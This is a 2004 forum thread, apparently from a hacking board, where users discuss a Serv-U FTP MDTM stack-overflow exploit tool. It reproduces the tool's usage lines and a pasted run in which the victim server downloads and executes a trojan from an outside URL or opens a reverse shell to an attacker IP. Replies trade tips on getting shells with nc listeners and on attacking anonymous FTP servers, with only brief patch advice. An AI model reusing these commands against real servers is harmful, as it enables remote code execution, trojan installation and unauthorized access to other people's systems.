Anarchy
Mar 1 2004, 01:16 AM
Usage: sv <Host> <Port> <User> <Pass>
sv <Host> <Port> <User> <Pass> <url>
sv <Host> <Port> <User> <Pass> <Your IP> <Your port>
e.g.:
sv 127.0.0.1 21 test test
sv 127.0.0.1 21 test test
http://hack.co.za/swan.exesv 127.0.0.1 21 test test 202.119.9.42 8111
ellitio
Mar 1 2004, 01:21 AM
hope this one gives a shell or execute a program...
because
this topicit won't execute the trojan.exe
| CODE |
D:\>serv
=======================================================
Serv-U MDTM Time Zone Stack Overflow Xploit v0.20 alpha
For Serv-U 5.0 and below written by SWAN@SEU
=======================================================
Usage: serv <Host> <Port> <User> <Pass>
serv <Host> <Port> <User> <Pass> <url>
serv <Host> <Port> <User> <Pass> <Your IP> <Your port>
e.g.:
serv 127.0.0.1 21 test test
serv 127.0.0.1 21 test test http://hack.co.za/swan.exe
serv 127.0.0.1 21 test test 202.119.9.42 8111
D:\>serv victimip port user pass http://pathtotrojan.com/trojan.exe
220 Serv-U FTP Server v5.0 for WinSock ready...
331 User name okay, need password.
230 User logged in, proceed.
Success! Host has download and execute the program...
D:\> |
ellitio
Mar 1 2004, 01:30 AM
only servu crashes but i dont get a shell : (
Anarchy
Mar 1 2004, 04:20 AM
i tested on win9x,can even telnet port 8111 on winXP servers.
how about win2003,may be so.
The caption of the telnet server I am seeing is "winXP ver 5.2"
yes,the ftp server will be crashed after exploited but u can get shell
Divx_dude
Mar 1 2004, 06:07 AM
all this shitty exploits goddamid :s
is there a WAY to secure your serv-u yet ??? plz wanne know!
| QUOTE (Divx_dude @ Mar 1 2004, 06:07 AM) |
| is there a WAY to secure your serv-u yet ??? plz wanne know! |
turn it off
Progressor
Mar 1 2004, 06:29 AM
Version 5.0.0.4 isn't vulnerable.
Krogoth
Mar 1 2004, 12:25 PM
yes, go for version 5.0.0.4 to stop this vulnerability.
studnikov
Mar 1 2004, 01:22 PM
tested on 5.0.0.0 with admin rights, just crashed the serv-u .. no shell
Gotisch
Mar 1 2004, 01:57 PM
what about just turning of mdtm ? there is a option in the ini ? will that help?
stonebreaker
Mar 1 2004, 02:22 PM
i want to say that this exploit works well for chinese edition windows+serv-u
can get reverse shell
TheAngel
Mar 1 2004, 03:03 PM
no luck for me
no shell
stonebreaker
Mar 1 2004, 03:09 PM
did you run nc on a certain port ?
XeLoRy
Mar 1 2004, 06:39 PM
reral thx, its a good soft.
thanks you very much
easternerd
Mar 1 2004, 09:56 PM
mebbe the shell which is not spawned is due to the case of having a firewall
or improper version like for example i managed to down my server ..but i never rcvd a shell cause i have a firewall ?
pls reply those who have a firewall !
ThEWaTcHeR
Mar 4 2004, 05:50 PM
hm, thanx for this n1ce one but i do`nt got a shell yet.
It crashes only the server
Uli
Mar 10 2004, 07:17 PM
finally had some time to test a bit:
>sv.exe 127.0.0.1 3699 Me Me
http://localhost:8080/somefile.exe331 User name okay, need password.
230 User logged in, proceed.
Success! Host has download and execute the program...
My exe file is a small exe undetected by NAV.
So far it crashes my serv-u but it does not download any file from anywhere and executes nothing..
XeLoRy
Mar 18 2004, 08:51 PM
exellent exploit !!!!
very good !!!
very very good
i love this exploit :!!!!
thaks you
ganz2
Mar 18 2004, 11:21 PM
doesnt seem to work on 4.1
RizL4
Apr 2 2004, 04:45 AM
this only for rehacking?
h3llraz0r
Apr 2 2004, 05:15 AM
| QUOTE (RizL4 @ Apr 2 2004, 04:45 AM) |
| this only for rehacking? |
most likely nice since it is used so much and will work better with a reverse shell rather than binding to a port
RizL4
Apr 2 2004, 05:20 AM
| QUOTE (h3llraz0r @ Apr 2 2004, 05:15 AM) |
| QUOTE (RizL4 @ Apr 2 2004, 04:45 AM) | | this only for rehacking? |
most likely nice since it is used so much and will work better with a reverse shell rather than binding to a port
|
thanxs for the info but can u hax Anonymous ftps?
with this
aapje
Apr 2 2004, 05:27 AM
yes, it should work with anonymous
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please
click here.
